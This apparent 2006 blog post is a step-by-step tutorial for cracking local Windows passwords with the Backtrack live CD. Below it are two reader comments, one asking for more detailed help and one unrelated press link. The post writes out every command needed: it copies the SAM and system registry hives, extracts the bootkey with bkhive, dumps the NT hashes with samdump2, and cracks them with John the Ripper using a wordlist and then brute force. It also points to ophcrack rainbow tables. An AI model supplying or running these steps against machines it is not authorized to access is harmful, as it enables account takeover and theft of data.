How To: Crack local Windows passwords with Backtrack (+ Downloads)

12 09 2006

Crack local Windows passwords with Backtrack v1.x – neophob

All credit goes to neophob:

A quick and dirty Windows password recovery:

Boot the Backtrack CD.

Change dir to your Windows mount point:
# cd /mnt/hda2/WINDOWS/system32/config
Copy the SAM and the system Registry hive to the temp dir:
# cp SAM /tmp
# cp system /tmp
Prepare our wordlist:
# cd /pentest/password/dictionaries/
# gunzip -c wordlist.txt.Z > /tmp/words.txt
# cd /tmp

As the Windows hashes (in the SAM file) are encrypted, we need this key (called bootkey) to decrypt the SAM hashes:
# bkhive system key
Now we can dump the password hashes out of the SAM file:
# samdump2 SAM key > /tmp/hashes.txt

Lets crack those hashes… the easiest way would be, if the password is in the wordlist, we use john for this case:
# john -w=words.txt -f=NT hashes.txt
No luck? Lets use the brute force method:
# john –incremental:all -f=NT hashes.txt

If this takes too long you could use ophcrack. This tool uses rainbow tables and should crack your hashes in a few seconds, but you need to download those rainbow tables (350mb or 700mb or you can generate them yourself) which are not included on the Backtrack cd (for a obvious reason…). Or you can use the oph online cracker, which should be quite fast.

Credits goes to

Hope this helps.



2 responses

19 09 2007

How can i change dir to windows mount point? dont really understand how to do this… tell me point for point what to do after booting the cd.. (backtracker)

19 09 2007
Sarah Webster

Hey-I thought you and your viewers might be interested in this story I wrote in today’s Detroit Free Press about Microsoft Auto in the new Ford Focus. They’re calling it Sync:

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

%d bloggers like this: